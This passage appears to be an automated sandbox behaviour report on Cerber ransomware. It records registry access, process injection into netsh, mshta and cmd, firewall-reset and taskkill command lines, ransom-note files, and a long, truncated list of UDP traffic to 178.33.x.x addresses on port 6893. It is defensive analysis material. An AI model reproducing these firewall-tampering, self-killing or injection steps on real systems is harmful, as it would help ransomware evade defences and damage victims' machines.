Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2892 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2892 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2892 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2892 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2892 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2892 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2892 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2892 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2892 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2892 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2892 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2892 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 744 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 744 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 744 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 744 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 744 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 744 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 744 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 744 wrote to memory of 2936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___RZUPL6_.hta"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___OV2T4ZEX_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

Network

Country Destination Domain Proto
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
